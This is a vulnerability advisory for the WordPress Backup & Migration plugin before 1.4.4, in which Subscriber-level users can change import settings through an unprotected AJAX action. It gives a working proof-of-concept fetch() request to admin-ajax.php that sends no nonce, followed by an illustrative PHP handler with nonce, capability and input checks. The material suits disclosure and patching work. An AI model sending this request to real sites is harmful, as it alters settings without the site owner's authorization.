wpexploit
Krzysztof Zając (CERT PL)
WPEX-ID:C761C67C-EAB8-4E1B-A332-C9A45E22BB13
History: Nov 06, 2023 - 12:00 a.m.

WordPress Backup & Migration < 1.4.4 - Subscriber+ Plugin Settings Update

wordpress security
backup
migration
plugin
settings update
exploit
csrf
cors

AI Score: 5.1 Medium (Confidence: High)
EPSS: 0.0004 Low (Percentile: 14.0%)

Description

The plugin does not authorize some AJAX requests, allowing users with a role as low as Subscriber to update some plugin settings.

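// Proof-of-concept request: a POST to admin-ajax.php that relies only on the
// session cookies ("credentials": "include"); the body carries no nonce.
// Decoded body:
//   settings_data[im_data_size_per_req]=100
//   settings_data[im_db_file_per_req]=200
//   action=mgdp_plugin_save_import_settings
fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "settings_data%5Bim_data_size_per_req%5D=100&settings_data%5Bim_db_file_per_req%5D=200&action=mgdp_plugin_save_import_settings",
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
});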

Open http://127.0.0.1:8001/wp-admin/admin.php?page=wp-migration-duplicator#wt-mgdp-import and click on Advanced Options to see the updated settings.
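
The checks a handler for this AJAX action needs, as an added example that is not the plugin's own code and not the change shipped in 1.4.4. It assumes it runs inside WordPress; the `example_` function, the nonce action, the option name and the choice of `manage_options` as the required capability are assumptions made for illustration.

```php
<?php
// Added example, not the plugin's code. The example_ function, the nonce
// action and the option name below are assumed names for illustration.

const EXAMPLE_NONCE_ACTION = 'example_mgdp_save_import_settings'; // assumed
const EXAMPLE_OPTION_NAME  = 'example_mgdp_import_settings';      // assumed

// wp_ajax_{action} fires for ANY logged-in user, Subscriber included,
// so the callback itself has to enforce who may change settings.
add_action( 'wp_ajax_mgdp_plugin_save_import_settings', 'example_save_import_settings' );

function example_save_import_settings() {
    // 1. Anti-CSRF: reject requests without a valid nonce for this action.
    if ( ! check_ajax_referer( EXAMPLE_NONCE_ACTION, '_wpnonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid nonce' ), 403 );
    }

    // 2. Authorization: only users allowed to manage options may proceed
    //    (capability chosen here as an assumption).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    // 3. Input handling: accept only the known keys, as positive integers.
    $raw = isset( $_POST['settings_data'] ) && is_array( $_POST['settings_data'] )
        ? wp_unslash( $_POST['settings_data'] )
        : array();

    $allowed  = array( 'im_data_size_per_req', 'im_db_file_per_req' );
    $settings = (array) get_option( EXAMPLE_OPTION_NAME, array() );

    foreach ( $allowed as $key ) {
        if ( isset( $raw[ $key ] ) && is_scalar( $raw[ $key ] ) ) {
            $value = absint( $raw[ $key ] );
            if ( $value > 0 ) {
                $settings[ $key ] = $value;
            }
        }
    }

    update_option( EXAMPLE_OPTION_NAME, $settings );
    wp_send_json_success( $settings );
}
```

With these checks in place, the request shown above (session cookie only, no nonce, Subscriber role) is answered with HTTP 403 and the settings stay unchanged.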
